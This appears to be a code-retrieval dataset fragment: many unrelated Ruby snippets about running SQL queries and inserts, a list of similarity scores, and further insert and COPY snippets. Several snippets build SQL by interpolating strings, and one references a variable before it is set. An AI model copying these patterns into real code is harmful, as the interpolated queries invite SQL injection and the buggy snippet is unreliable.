"def run_sql(sql_query)\n begin\n CONNECTION.execute(sql_query)\n rescue Exception => msg\n msg\n end\n end",
"def setup_connection(conn)\n conn = super(conn)\n statement(conn) do |stmt|\n connection_pragmas.each{|s| log_connection_yield(s, conn){stmt.execute(s)}}\n end\n conn\n end",
"def set_sql_query\n @sql_query = SqlQuery.find(params[:id])\n end",
"def run_query()\n return nil unless @query\n \n gres = @query.execute()\n if @filterClass \n fres = @filterClass.filter(gres)\n res = fres.kind_of?(Array) ? fres.join(\"\\n\") : fres.to_s\n elsif @filterBlock \n fres = @filterBlock.call(gres)\n res = fres.kind_of?(Array) ? fres.join(\"\\n\") : fres.to_s\n else\n res = fres.result_s\n end\n res\n end",
"def statements\n @statements ||= statements_as_subject + statements_as_predicate + statements_as_object\n end",
"def execute(sql, name = nil) #:nodoc:\n log(sql, name) { @connection.exec sql }\n end",
"def generate_query\n unless databases.nil?\n databases.each do |db|\n create_query[db] = [\"create table #{tablename} (\"]\n end\n csv_column_datatypes.each do |header, datatype|\n append_to_query = build_query_for_datatype(header, datatype)\n append_to_query.each do |key, value|\n create_query[key].push(value)\n end\n end\n prepare_sql_statements\n prepare_import_csv\n # Pass the prepared statements to options varaible.\n # Which gets passed on to print_metadata_analysis\n options[:create_query] = create_query\n options[:import_query] = import_query\n end\n print_metadata_analysis\n end",
"def sql_string\n self\n end",
"def index\n @my_sqls = MySql.all\n end",
"def sql_state; end",
"def run_sql(query)\n raw_run_sql(query)\n end",
"def queries\n @requested_queries.map { |key| Gquery.get(key) }.compact\n end",
"def _execute(sql, name = nil)\n @connection.execute(sql)\n end",
"def execute(sql)\r\n\t\t@connection.Execute(sql)\r\n\tend",
"def request_sql(host,port,extra_condition)\n\t\tWmapRequest.find(:all, :conditions => [\"wmap_requests.host = ? AND wmap_requests.port = ? #{extra_condition}\",host,port])\n\tend",
"def all() \n @sql = @default_sql\n query(@sql) unless @a\n @a\n end",
"def sql_on_all_sids( command, parameters = {})\n results = []\n oratab = OraTab.new\n oratab.running_database_sids.each do |sid|\n results = results + sql(command, {:sid => sid}.merge(parameters))\n end\n results\n end",
"def set_my_sql\n @my_sql = MySql.find(params[:id])\n end",
"def initialize(sql)\n @sql = sql\n end",
"def query_script(example, sql, log_name=nil)\n log_name ||= 'Run SQL Script'\n\n debuggable_sql = SqlPreprocessor.debuggable_sql(sql)\n executable_sql = SqlPreprocessor.executable_sql(sql, example)\n\n example.metadata[:sql] += ((example.metadata[:sql] == '' ? '' : \"\\n\\n\") + \"-- #{log_name.split(/\\r\\n|\\n/).join(\"\\n-- \")}\\n#{debuggable_sql}\")\n application.query_script(executable_sql)\n end",
"def execute_query(sql, args)\n @db.log_connection_yield(sql, self, args){args ? async_exec(sql, args) : async_exec(sql)}\n end",
"def execute(sql)\n @db.send(:_execute, self, sql, :log=>false) \n end",
"def execute_query(sql, args)\n\t\t\t\t\t@db.log_connection_yield(sql, self, args){args ? self.async_exec(sql, args) : self.async_exec(sql)}\n\t\t\t\tend",
"def query(sql)\n if NB.neverblocking? && NB.reactor.running?\n send_query sql\n NB.wait(:read, IO.new(socket))\n get_result\n else\n super(sql)\n end\n end",
"def execute(sql, name = nil) \n # Only skip select statements from logging \n unless /^(select|show|begin|commit)/i.match(sql.strip) \n\t\tFile.open( File.join(RAILS_ROOT, 'db', 'ddl.sql'),'a') {|f|\n\t\t\ttemp_sql = sql.gsub(\"\\n\",\"\") \n\t\t\ttemp_sql = temp_sql + ';' if adapter_name != 'IBM_DB2' or adapter_name != 'IBM_DB'\n\t\t\tf.puts temp_sql\n\t\t}\n end\n\t old_execute sql, name\n end",
"def execute(sql, name = nil)\n # lol no, won't hit connection pool just for this one\n #\n # if @connection\n # # make sure we carry over any changes to ActiveRecord::Base.default_timezone that have been\n # # made since we established the connection\n # @connection.query_options[:database_timezone] = ActiveRecord::Base.default_timezone\n # end\n\n log(sql, name) { @connection.query(sql) }\n end",
"def statements\n @statements ||= statements_as_subject + statements_as_predicate + statements_as_object\n end",
"def prepare(name, sql)\n check_disconnect_errors{super}\n end",
"def prepared_sql\n case prepared_type\n when :select, :all, :each\n # Most common scenario, so listed first.\n select_sql\n when :first\n clone(:limit=>1).select_sql\n when :insert_select\n insert_select_sql(*prepared_modify_values)\n when :insert, :insert_pk\n insert_sql(*prepared_modify_values)\n when :update\n update_sql(*prepared_modify_values)\n when :delete\n delete_sql\n else\n select_sql\n end\n end",
"def prep_sql_for_run\n self.sql = sql.strip\n self.sql = sql[0..-2] if sql.last == ';'\n self.sql = sql.dup\n end",
"def exec_query(sql, name = 'SQL', binds = [])\n execute(sql, name, binds)\n end",
"def query_options\n @query_options ||= @connection.query_options\n end",
"def execute(sql, name = nil, binds = []) #:nodoc:\r\n if name == :skip_logging\r\n query(sql, binds)\r\n else\r\n log(sql, name, binds) { query(sql, binds) }\r\n end\r\n end",
"def run_sql(sql_query)\n\tconn = PG.connect(dbname: 'first_crud_app')\n\tresult = conn.exec(sql_query)\n\tconn.close\n\tresult\nend",
"def ps\n sql = %q(\n select\n procpid,\n application_name as source,\n age(now(),query_start) as running_for,\n waiting,\n current_query as query\n from pg_stat_activity\n where\n current_query <> '<insufficient privilege>'\n AND current_query <> '<IDLE>'\n and procpid <> pg_backend_pid()\n order by 3 desc\n )\n\n exec_sql(sql, find_uri)\n end",
"def execute(sql)\n @database_handle.execute(sql)\n end",
"def before_query(query)\n Rails.logger.info(\"[QUERY BEGIN] >>> #{Time.now.to_i}\")\n end",
"def log_current_test_query\n qc_current_inspection = get_current_inspection_record( session[:user_id].id, session[:qc_inspection_type_code] )\n if qc_current_inspection.nil?\n ActiveRecord::Base.connection.execute(\"INSERT INTO qc_current_inspections\n (user_id, qc_inspection_type_code, qc_tests_query, tests_columns_list)\n VALUES(#{session[:user_id].id}, '#{session[:qc_inspection_type_code]}',\n '#{dm_session[:search_engine_query_definition].gsub(/'/, \"''\")}', '#{session[:columns_list].to_yaml}')\")\n else\n ActiveRecord::Base.connection.execute(ActiveRecord::Base.extend_update_sql_with_request(\"UPDATE qc_current_inspections\n SET qc_tests_query = '#{dm_session[:search_engine_query_definition].gsub(/'/, \"''\")}',\n tests_columns_list = '#{session[:columns_list].to_yaml}'\n WHERE user_id = #{session[:user_id].id} AND qc_inspection_type_code = '#{session[:qc_inspection_type_code]}' \"))\n end\n end",
"def all_dbs\n @conn.query({url_path: \"_all_dbs\", method: :get})\n end"
] |
[
"0.6558",
"0.6437771",
"0.6432272",
"0.64197713",
"0.64197713",
"0.6389099",
"0.63364065",
"0.6318091",
"0.63028187",
"0.62802106",
"0.62638634",
"0.6246098",
"0.6229926",
"0.61795676",
"0.61747974",
"0.61747974",
"0.6153917",
"0.6148627",
"0.6138928",
"0.6134228",
"0.61048144",
"0.60947055",
"0.60911334",
"0.6090994",
"0.60886854",
"0.60334396",
"0.59891164",
"0.5976449",
"0.5923984",
"0.5919582",
"0.5915083",
"0.5892746",
"0.58817804",
"0.5875223",
"0.58607084",
"0.5857267",
"0.5855898",
"0.58350706",
"0.5808401",
"0.5800635",
"0.5798429",
"0.5784897",
"0.5776502",
"0.5776502",
"0.5771748",
"0.57515854",
"0.5748659",
"0.5733168",
"0.5729824",
"0.5729824",
"0.57224363",
"0.57080775",
"0.5679637",
"0.56737006",
"0.5663665",
"0.56491375",
"0.56394255",
"0.56360215",
"0.5628278",
"0.5627319",
"0.5603103",
"0.559621",
"0.55917823",
"0.5589617",
"0.5580673",
"0.55752265",
"0.5567928",
"0.55673707",
"0.55673665",
"0.556547",
"0.556466",
"0.5559881",
"0.555549",
"0.5553651",
"0.5547491",
"0.5539463",
"0.55323046",
"0.55291414",
"0.55270606",
"0.5526022",
"0.55225307",
"0.5507866",
"0.550485",
"0.55031085",
"0.5498581",
"0.54940355",
"0.5494002",
"0.54938793",
"0.54810447",
"0.54783064",
"0.5470056",
"0.5466946",
"0.5451462",
"0.54490745",
"0.54458594",
"0.5443188",
"0.5437745",
"0.54263955",
"0.54262877",
"0.5417245"
] |
0.57855695
|
41
|
SQL for doing fast table insert from stdin.
|
def copy_into_sql(table, opts)
sql = String.new
sql << "COPY #{literal(table)}"
if cols = opts[:columns]
sql << literal(Array(cols))
end
sql << " FROM STDIN"
if opts[:options] || opts[:format]
sql << " ("
sql << "FORMAT #{opts[:format]}" if opts[:format]
sql << "#{', ' if opts[:format]}#{opts[:options]}" if opts[:options]
sql << ')'
end
sql
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def format table, keys, values\n <<-SQL\nCOPY #{table} (#{keys.join(', ')}) FROM stdin;\n#{values.collect { |row| row.join \"\\t\" }.join \"\\n\"}\n\\\\.\n SQL\n end",
"def fast_insert(rows, base_cmd, end_cmd = '')\n RawDB.fast_insert(db, rows, base_cmd, end_cmd)\n end",
"def row_sql_insert(table_name, table_struct)\n fields = get_fields(table_struct)\n\n sql = <<-EOF\n INSERT INTO `#{DBNAME}`.`#{table_name}` (\n #{fields.collect { |f| \"`#{f}`\" }.join(\", \")}\n )\n VALUES (\n #{fields.collect { |f| \"'%s'\" }.join(\", \")}\n );\n EOF\n\n sql\nend",
"def insert_into_sql(sql)\n sql << \" INTO \"\n if (f = @opts[:from]) && f.length == 1\n identifier_append(sql, server_version >= 90500 ? f.first : unaliased_identifier(f.first))\n else\n source_list_append(sql, f)\n end\n end",
"def generate_pg_insert_query(table_name, keys, rows)\n \"INSERT INTO #{table_name}(#{keys.map { |i| \"\\\"#{i}\\\"\" }.join(',')}) VALUES(#{keys.map { |i| rows[i] == nil ? 'NULL' : \"'\" + pg_conn.escape_string(rows[i]) + \"'\" }.join(',')});\\n\"\n end",
"def insert_data(output, db, table)\n result = query(db, \"SELECT * FROM #{table}\", \"hash\")\n changes = false\n result.each do |row|\n to_insert(output, table, row)\n changes = true\n end\n output << \"\\n\" if changes\n end",
"def dump_insert_multi(io, table_obj, rows)\n print \"Inserting #{rows.length} into #{table_obj.name}.\\n\" if @debug\n sqls = @args[:db].insert_multi(table_obj.name, rows, :return_sql => true, :keys => @keys)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n rows.clear\n \n #Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def build_sql(value_str)\n \"COPY #{value_str} FROM STDIN WITH (FORMAT csv, DELIMITER E'\\x0B')\"\n end",
"def raw_sql_insert\r\n client = self.connect\r\n dataset = client[:fleet]\r\n \r\n db_str = \"LOAD DATA INFILE '/home/user/fleet.csv' \" +\r\n \"INTO TABLE fleet \" +\r\n \"FIELDS TERMINATED BY '\\t' \" +\r\n \"IGNORE 1 LINES \" +\r\n \"(@dummy, name, description);\"\r\n \r\n # raw mysql query.\r\n client.run(db_str)\r\n \r\n # cleanup\r\n puts \"raw sql insert\"\r\n client.disconnect\r\n \r\n return true\r\n end",
"def write_weight_table()\n puts <<SQL\ndrop table if exists WEIGHT;\ndrop index if exists id_idx;\ndrop index if exists sequence_idx;\n\ncreate table WEIGHT(\n id char(5) not null,\n sequence char(2) not null,\n amount float not null,\n description varchar(84) not null,\n grams float not null,\n data_points int default null,\n std_deviation float default null,\n primary key (id, sequence)\n);\n\ncreate index id_idx on WEIGHT(id);\ncreate index sequence_idx on WEIGHT(sequence);\n\nSQL\n\n read_data('WEIGHT.txt') do |fields|\n puts make_insert_statement('WEIGHT', fields,\n 'id', 'sequence', 'amount', 'description', 'grams',\n 'data_points', 'std_deviation')\n end\nend",
"def dump_insert_multi(io, table_obj, rows)\n debug \"Inserting #{rows.length} into #{table_obj.name}.\"\n sqls = @export_db.insert_multi(\n table_obj.name,\n rows,\n replace_line_breaks: true,\n return_sql: true,\n keys: @keys\n )\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n\n rows.clear\n\n # Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def insert_into(table, data)\n\t\tkeys = \"(#{data.keys.join(', ')})\"\n\t\tvalues = \"(#{data.values.map{ |value| \"'#{value}'\" }.join(', ')})\"\n\t\texecute_with_retry \"INSERT INTO #{table} #{keys} VALUES #{values}; \"\n\tend",
"def to_inserts(args={})\n args[:table] ||= Pathname.new(@filename).basename.to_s.downcase.gsub(/\\W/, '_')\n args[:before] ||= @@defaults[:before]\n args[:after] ||= @@defaults[:after]\n insert_sql = args[:ignore] ? 'insert ignore' : 'insert'\n if args[:bulk]\n args[:before] += \"#{insert_sql} into #{args[:table]} values\"\n args[:values_glue] ||= \", \"\n args[:row_format] ||= \" (%s)\"\n args[:row_glue] ||= \",\\n\"\n else\n args[:before] ||= \"\"\n args[:values_glue] ||= \", \"\n args[:row_format] ||= \"#{insert_sql} into #{args[:table]} values(%s)\"\n args[:row_glue] ||= \";\\n\"\n end\n to_any args\n end",
"def db_insert table, fields= {}\n #client = Mysql2::Client.new(:host => \"localhost\", :username => \"root\", :password => \"toor\", :database => \"filesorter\")\n @query= \"INSERT INTO `#{table}` (`#{fields.keys.join('`, `')}`) VALUES ('\"+fields.values.join(\"', '\")+\"');\"\n do_query\n end",
"def to_bulk_insert_script\n s = TRANSACTION_START[db_type].dup\n s << \"\\n\"\n insert_command = rows.first.bulk_insert_str\n\n rows.each_slice(500) do |sliced_rows|\n s << insert_command\n s << sliced_rows.map {|row| row.bulk_insert_values_str(db_type) }.join(\",\\n\")\n s << \"#{SqlRow::STATEMENT_TERMINATOR[db_type]}\\n\"\n end\n\n s << \"#{TRANSACTION_END[db_type]}\\n\"\n s\n end",
"def write_food_group_table()\n puts <<SQL\ndrop table if exists FOOD_GROUP;\ncreate table FOOD_GROUP(\n id char(5) not null,\n description varchar(60) not null,\n primary key(id)\n);\nSQL\n\n read_data('FD_GROUP.txt') do |fields|\n puts make_insert_statement('FOOD_GROUP', fields, 'id', 'description')\n end\nend",
"def sql_insert(record)\n flds, vals = parse_fldsvalues(record)\n ph = vals.map{|x| placeholder }\n\n sql = %Q|insert into #{quoted_table}\n ( #{flds.join ','} )\n output inserted.#{quote_field id_fld}\n values( #{ph.join ','} );|\n\n [sql, vals]\n end",
"def exec_insert(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def to_insert(output, table, row)\n columns = @columns[table].map {|i| i[0] }.join(',')\n values = map_values(row, @columns[table])\n output << \"INSERT INTO #{table} (#{columns}) VALUES (#{values});\\n\"\n end",
"def generate_insert tab_name, argv\n\n\t\t\t\t# Attribute of table.\n\t\tattribute = \"\"\n\t\tattribute << \"id\"\n\t\ti = 0\n\t\targv.each do |k,v|\n\t\t\tif i == 0 and argv.length != 0\n\t\t\t \tattribute << \",\"\n\t\t\t end\n\t\t\tattribute << k\n\t\t\ti = i.to_i + 1\n\t\t\tif i != argv.length\n\t\t\t\tattribute << \",\"\n\t\t\tend\n\t\tend\n\t\t\t\t# Values of the Attributes.\n\t\tval = []\n\t\tval << \"NULL\"\n\t\ti = 0\n\t\tif argv.length != 0\n\t\t\tbegin\n\t\t\t\tval << \"\\\"#{argv[argv.keys[i]]}\\\"\"\n\t\t\t\ti = i.to_i + 1 \t\t\n\t\t\tend while i < argv.length.to_i\t\n\t\tend\t\t\n\n\t\tif argv.length == 0\n\t\t\tquery = \" INSERT INTO #{tab_name}(#{attribute}) VALUES (#{val * \"\"}) \"\n\t\t\treturn query\n\t\telse\n\t\t\tquery = \" INSERT INTO #{tab_name}(#{attribute}) VALUES (#{val * \",\"}) \"\n\t\t\treturn query\n\t\tend\n\tend",
"def import_csv_file(db, encoding, file, table)\n verbose \"Reading the header row.\"\n row_num = 0\n\n # Decide whether to get the CSV data from a file or STDIN\n if file == ''\n csv = CSV($stdin)\n if table == ''\n table = 'stdin'\n end\n else\n csv = CSV.open(file, encoding:encoding)\n end\n\n # Process each line of the CSV data\n csv.each do |row|\n # header row\n if row_num == 0\n verbose \"Columns are: #{row.inspect}\"\n\n column_defs = \"\"\n column_names = \"\"\n column_placeholders = \"\"\n\n row.each do |column|\n column_defs << \"#{column} VARCHAR, \"\n column_names << \"#{column}, \"\n column_placeholders << \"?, \"\n end\n\n # Remove the comma after last column\n column_defs.sub!(/,\\ \\Z/, '')\n column_names.sub!(/,\\ \\Z/, '')\n column_placeholders.sub!(/,\\ \\Z/, '')\n\n verbose \"Creating the #{table} table:\"\n create_table_query = \"CREATE TABLE IF NOT EXISTS #{table} (#{column_defs})\"\n verbose \"#{create_table_query};\"\n db.execute create_table_query\n\n verbose \"Prepared statement is:\"\n prepared_statement = \"INSERT INTO #{table} (#{column_names}) VALUES (#{column_placeholders})\"\n verbose \"#{prepared_statement};\"\n @insert = db.prepare(prepared_statement)\n # non-header rows\n else\n verbose \"Inserting row #{row_num}.\"\n @insert.execute(row)\n end\n row_num += 1\n end\nend",
"def exec_insert(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def copy_to(db, args = {})\r\n data[\"tables\"].each do |table|\r\n table_args = nil\r\n table_args = args[\"tables\"][table[\"name\"].to_s] if args and args[\"tables\"] and args[\"tables\"][table[\"name\"].to_s]\r\n next if table_args and table_args[\"skip\"]\r\n table.delete(\"indexes\") if table.key?(\"indexes\") and args[\"skip_indexes\"]\r\n db.tables.create(table[\"name\"], table)\r\n \r\n limit_from = 0\r\n limit_incr = 1000\r\n \r\n loop do\r\n ins_arr = []\r\n q_rows = self.select(table[\"name\"], {}, {\"limit_from\" => limit_from, \"limit_to\" => limit_incr})\r\n while d_rows = q_rows.fetch\r\n col_args = nil\r\n \r\n if table_args and table_args[\"columns\"]\r\n d_rows.each do |col_name, col_data|\r\n col_args = table_args[\"columns\"][col_name.to_s] if table_args and table_args[\"columns\"]\r\n d_rows[col_name] = \"\" if col_args and col_args[\"empty\"]\r\n end\r\n end\r\n \r\n ins_arr << d_rows\r\n end\r\n \r\n break if ins_arr.empty?\r\n \r\n db.insert_multi(table[\"name\"], ins_arr)\r\n limit_from += limit_incr\r\n end\r\n end\r\n end",
"def make_insert(table, columns, fields, row)\n statement = \"INSERT INTO #{table['name']} (#{fields.join(',')}) VALUES (\"\n values = []\n fields.each do |field|\n values << make_val(row[field], columns[field])\n end\n statement << \"#{values.join(',')});\\n\"\n statement\n end",
"def execute_insert(sql, opts=OPTS)\n _execute(sql, opts){|conn| log_connection_yield(sql, conn){conn.execute_batch(sql)}; conn.last_insert_rowid}\n end",
"def gen_insert_file(a1, a2, a3, a4, a5, a6)\r\n t = get_cur_time\r\n $ins.puts \"INSERT IGNORE INTO activities (f_homepage,start_city,end_city,start_time,end_time,remarks,created_at,beauty) VALUES ('%s','%s','%s','%s','%s','%s','%s',107);\" % [a1, a2, a3, a4, a5, a6, t]\r\nend",
"def db_insert(image_dataset_id)\n ####\"INSERT INTO raw_image_files\n ####(filename, header_reader, file_type, timestamp, source, rmr_number, series_description, \n ####gender, num_slices, slice_thickness, slice_spacing, reconstruction_diameter, \n ####acquisition_matrix_x, acquisition_matrix_y, rep_time, bold_reps, created_at, updated_at, image_dataset_id)\n ####VALUES ('#{@filename}', '#{@hdr_reader}', '#{@file_type}', '#{@timestamp.to_s}', '#{@source}', '#{@rmr_number}', \n ####'#{@series_description}', '#{@gender}', #{@num_slices}, #{@slice_thickness}, #{@slice_spacing}, \n #### #{@reconstruction_diameter}, #{@acquisition_matrix_x}, #{@acquisition_matrix_y}, #{@rep_time}, \n #### #{@bold_reps}, '#{DateTime.now}', '#{DateTime.now}', #{image_dataset_id})\" \n puts \"Old no raw_image_files table\"\n end",
"def execute_insert(sql, opts={})\n synchronize(opts[:server]) do |conn|\n conn.execute(sql)\n insert_result(conn, opts[:table], opts[:values])\n end\n end",
"def exec_insert(sql, name = nil, binds = [], pk = nil, sequence_name = nil)\n exec_query(sql, name, binds)\n end",
"def ins table, col, val\n pst = @con.prepare 'INSERT INTO ' + s(table) + '(' + s(col) + ') VALUES(?)'\n pst.execute s(val)\n #puts 'INSERT INTO ' + s(table) + '(' + s(col) + ') VALUES(' + s(val) + ')'\n end",
"def copy_table_sql(table, opts)\n if table.is_a?(String)\n table\n else\n if opts[:options] || opts[:format]\n options = String.new\n options << \" (\"\n options << \"FORMAT #{opts[:format]}\" if opts[:format]\n options << \"#{', ' if opts[:format]}#{opts[:options]}\" if opts[:options]\n options << ')'\n end\n table = if table.is_a?(::Sequel::Dataset)\n \"(#{table.sql})\"\n else\n literal(table)\n end\n \"COPY #{table} TO STDOUT#{options}\"\n end\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def obfuscate(input_io, output_io)\n # We assume that every INSERT INTO line occupies one line in the file, with no internal linebreaks.\n input_io.each do |line|\n if regex_result = INSERT_REGEX.match(line)\n table_name = regex_result[1].to_sym\n columns = regex_result[2].split(/`\\s*,\\s*`/).map { |col| col.gsub('`',\"\").to_sym }\n if config[table_name]\n output_io.puts obfuscate_bulk_insert_line(line, table_name, columns)\n else\n output_io.write line\n end\n else\n output_io.write line\n end\n end\n end",
"def exec_insert(sql, name = nil, binds = []) #:nodoc:\r\n log(sql, \"insert\", binds) { query(sql, binds) }\r\n end",
"def raw_sql(record)\n record.class.arel_table.create_insert.tap do |insert_manager|\n insert_manager.insert(insert_values(record))\n end.to_sql\n end",
"def generate_insert\n @binds = Array.new\n @insert_statement = \"insert into #{fully_qualified_table_name} (\"\n @insert_statement << column_details.keys.sort.map { |k| column_detail(k).column_name }.join(',')\n @insert_statement << ') values ('\n @insert_statement << column_details.keys.sort.map { |k|\n \":#{k}\"\n }.join(',')\n column_details.keys.sort.each { |k|\n if @column_values[k] == nil\n @binds.push [column_type_to_ruby_type(column_details[k]), nil]\n else\n @binds.push @column_values[k]\n end\n }\n @insert_statement << ')'\n @insert_statement\n end",
"def insert!(*rows)\n Mao.sql(with_options(:insert => rows.flatten).sql) do |pg_result|\n if @options[:returning]\n pg_result.map {|result| Mao.normalize_result(result, @col_types)}\n else\n pg_result.cmd_tuples\n end\n end\n end",
"def copy_statement(table_name, options = {})\n format_options = replication.csv? ? \"CSV\" : \"GZIP DELIMITER ',' ESCAPE REMOVEQUOTES\"\n sql = <<-CS\n COPY #{table_name} from '#{import_file}' #{\"NOLOAD\" if options[:noload]}\n REGION '#{RailsRedshiftReplicator.s3_bucket_params[:region]}'\n CREDENTIALS 'aws_access_key_id=#{RailsRedshiftReplicator.aws_credentials[:key]};aws_secret_access_key=#{RailsRedshiftReplicator.aws_credentials[:secret]}'\n #{format_options}\n #{copy_options}\n CS\n sql.squish\n end",
"def insert_by_data data, table\n sql = \"insert into #{table} \"\n case data\n when Array\n data.each do |d|\n insert_by_data(d, table)\n end\n when Hash\n columns = data.keys.to_s.gsub('[','(').gsub(']',')').gsub('\"','')\n values = data.values.to_s.gsub('[','(').gsub(']',')').gsub('nil','NULL')\n sql = sql + columns + \" values \" + values\n query(sql)\n end\n end",
"def _construct_multiple_insert_sql(table, fields, rows)\n \n return nil if table.nil? || fields.nil? || rows.nil?\n \n insert_sql = \"insert into #{table} ( #{fields.join(\", \")} ) values\"\n x = 0\n \n rows.each do |row|\n insert_sql += \",\" if x > 0\n insert_sql += \" (\"\n y = 0\n \n row.each do |value|\n insert_sql += \",\" if y > 0\n insert_sql += _construct_sql_value(value)\n y += 1\n end\n \n insert_sql += \")\"\n \n x += 1\n end\n \n insert_sql\n \n end",
"def write_nutrient_definition_table()\n puts <<SQL\ndrop table if exists NUTRIENT_DEFINITION;\ncreate table NUTRIENT_DEFINITION(\n id char(3) not null,\n units varchar(7) not null,\n tagname varchar(20) default null,\n description varchar(60) default null,\n decimal_places char(1) default null,\n sort_order int default null,\n primary key (id)\n);\nSQL\n\n read_data('NUTR_DEF.txt') do |fields|\n puts make_insert_statement('NUTRIENT_DEFINITION', fields,\n 'id', 'units', 'tagname', 'description',\n 'decimal_places', 'sort_order')\n end\nend",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def dump_table(io, table_obj)\n #Get SQL for creating table and add it to IO.\n sqls = @args[:db].tables.create(table_obj.name, table_obj.data, :return_sql => true)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n \n #Try to find a primary column in the table.\n prim_col = nil\n table_obj.columns do |col|\n if col.primarykey?\n prim_col = col\n break\n end\n end\n \n \n #Set up rows and way to fill rows.\n rows = []\n block_data = proc do |row|\n rows << row\n @rows_count += 1\n \n if rows.length >= 1000\n self.update_status\n self.dump_insert_multi(io, table_obj, rows)\n end\n end\n \n \n #If a primary column is found then use IDQuery. Otherwise use cloned unbuffered query.\n args = {:idquery => prim_col.name.to_sym} if prim_col\n \n \n #Clone the connecting with array-results and execute query.\n @args[:db].clone_conn(:result => \"array\") do |db|\n db.select(table_obj.name, nil, args, &block_data)\n end\n \n \n #Dump the last rows if any.\n self.dump_insert_multi(io, table_obj, rows) if !rows.empty?\n end",
"def execute_insert(sql, opts=OPTS)\n execute(sql, opts.merge(:meth=>:autoid))\n end",
"def multi_insert_sql(columns, values)\n table = quote_identifier(@opts[:from].first)\n columns = literal(columns)\n values.map do |r|\n \"INSERT INTO #{table} #{columns} VALUES #{literal(r)}\"\n end\n end",
"def execute(sql)\n tmp = Digest::MD5.hexdigest(sql)\n tmp_path = \"#{TMP_DIR}/#{tmp}\"\n File.write tmp_path, sql \n scp_upload! tmp_path, tmp_path \n result = C.exec! \"psql -A -t -d #{TMP_DB} -f #{tmp_path}\"\n C.exec! \"rm #{tmp_path}\"\n File.delete tmp_path\n result\nend",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def dbinsert(table, variables, variable_names)\n i = 1\n marks = \"?\"\n while i < variables.length\n marks += \",?\"\n i += 1\n end\n\n v = \"\"\n i = 0\n while i < variables.length\n v += variables[i].to_s \n i += 1\n if i < variables.length\n v += \", \"\n end\n end\n\n return db.execute(\"INSERT INTO #{table}(#{v}) VALUES (#{marks})\", variable_names)\nend",
"def single_insert(table_name, hash)\n status = true\n begin\n columns = []\n values = []\n hash.keys.each do |item|\n columns.push(item)\n values.push(\"'#{hash[item]}'\")\n end\n columns = columns.join(\",\")\n values = values.join(\",\")\n @mysql_client.query(\"INSERT INTO #{table_name} (#{columns}) VALUES (#{values})\")\n rescue\n status = false\n end\n return status\n end",
"def obfuscate(input_io, output_io)\n\n # We assume that every INSERT INTO line occupies one line in the file, with no internal linebreaks.\n input_io.each do |line|\n if table_data = database_helper.parse_insert_statement(line)\n table_name = table_data[:table_name]\n columns = table_data[:column_names]\n if config[table_name]\n output_io.puts obfuscate_bulk_insert_line(line, table_name, columns)\n else\n $stderr.puts \"Deprecated: #{table_name} was not specified in the config. A future release will cause this to be an error. Please specify the table definition or set it to :keep.\"\n output_io.write line\n end\n else\n output_io.write line\n end\n end\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil) end",
"def insert_takoble\n\t\tsql = \"insert into TAKO_List values (?, ?)\"\n\t\treturn sql\n\tend",
"def execute_insert(sql, opts=OPTS)\n synchronize(opts[:server]) do |c|\n if sql.is_a?(Symbol)\n execute_prepared_statement(sql, opts)\n else\n _execute(c, sql, opts)\n end\n _execute(c, \"SELECT IDENTITY_VAL_LOCAL() FROM SYSIBM.SYSDUMMY1\", opts){|stmt| i = stmt.fetch_array.first.to_i; i}\n end\n rescue Connection::Error => e\n raise_error(e)\n end",
"def statement\n [\n \"insert into\",\n @table,\n column_list,\n query_expression,\n ].compact.join(' ')\n end",
"def insert_multi(tablename, arr_hashes, args = {})\n sql = \"INSERT INTO `#{tablename}` (\"\n\n first = true\n if args && args[:keys]\n keys = args[:keys]\n elsif arr_hashes.first.is_a?(Hash)\n keys = arr_hashes.first.keys\n else\n raise \"Could not figure out keys.\"\n end\n\n keys.each do |col_name|\n sql << \",\" unless first\n first = false if first\n sql << quote_column(col_name)\n end\n\n sql << \") VALUES (\"\n\n first = true\n arr_hashes.each do |hash|\n if first\n first = false\n else\n sql << \"),(\"\n end\n\n first_key = true\n if hash.is_a?(Array)\n hash.each do |val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n else\n hash.each do |_key, val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n end\n end\n\n sql << \")\"\n\n return sql if args && args[:return_sql]\n\n query_no_result_set(sql)\n\n if args && args[:return_id]\n first_id = last_id\n raise \"Invalid ID: #{first_id}\" if first_id.to_i <= 0\n ids = [first_id]\n 1.upto(arr_hashes.length - 1) do |count|\n ids << first_id + count\n end\n\n ids_length = ids.length\n arr_hashes_length = arr_hashes.length\n raise \"Invalid length (#{ids_length}, #{arr_hashes_length}).\" if ids_length != arr_hashes_length\n\n return ids\n else\n return nil\n end\n end",
"def process line\n return unless line.gsub!(/^INSERT INTO `\\w+` VALUES \\(/,\"\")\n warn \"bad ending\" unless line.gsub!(/\\);?$/, '')\n line.split(/\\),\\(/).each do |tuple|\n begin\n QUOTED_QUOTE_RE.gsub!(tuple, \"''\")\n emit FasterCSV.parse_line(tuple, :quote_char => \"'\")\n rescue FasterCSV::MalformedCSVError => e\n warn \"#{e}: #{tuple}\"\n end\n \n end\n end",
